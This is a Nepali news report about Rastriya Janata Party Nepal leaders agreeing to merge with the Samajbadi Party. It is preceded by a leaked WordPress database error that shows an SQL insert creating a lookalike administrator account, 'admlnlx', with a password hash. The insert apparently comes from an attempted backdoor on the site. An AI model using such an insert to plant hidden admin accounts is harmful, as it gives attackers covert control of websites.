WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B5seN1ItZKuDoQR7NER9BeVDYEvfl60', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-06 09:39:29', '', 'admlnlx', 'admlnlx')
बैशाख १९, काठमाडौँ –
जनता पार्टी नेपाल अध्यक्षमण्डलका सदस्य अनिलकुमार झा र राजकिशोर यादवले पनि सहमति जनाएपछि समाजवादी पार्टी र राजपा बीचमा भएको एकीकरण प्रक्रिया अगाडी बढ्ने भएको छ ।
पार्टी बीच एकीकरणका लागि सैद्धान्तिक सहमति भएको दिन झा र यादव अनुपस्थित थिए । तर उनीहरूले पनि त्यसमा हस्ताक्षर गरी सहमति जनाएपछि पार्टी दर्ताको प्रकृया अगाडि बढेको जनाइएको छ ।बैशाख १६ गते बसेको तत्कालीन राजपा नेपाल अध्यक्षमण्डलको बैठकले दुई दल बीचमा भएको सहमतिलाई अनुमोदन गरेको थियोे । एकीकरणका लाागि भएको सहमतिलाई अनुमोदन गर्ने माइन्युटमा अनिलकुमार झा र राजकिशोर यादवसहित तत्कालीन अध्यक्षमण्डलमा रहेका छ जना सदस्यकै हस्ताक्षर रहेको छ ।
पार्टी एकीकरण विषयलाई लिएर यी दुईजना नेताले शुरुदेखि नै फरकमत राख्दै आएका थिए । उनीहरूले अरु दलसँग एकीकरण गर्नु भन्दा पहिले आफ्नै पार्टी ब्यवस्थित हुनुपर्ने अडानमा थिए ।
-रातोपाटी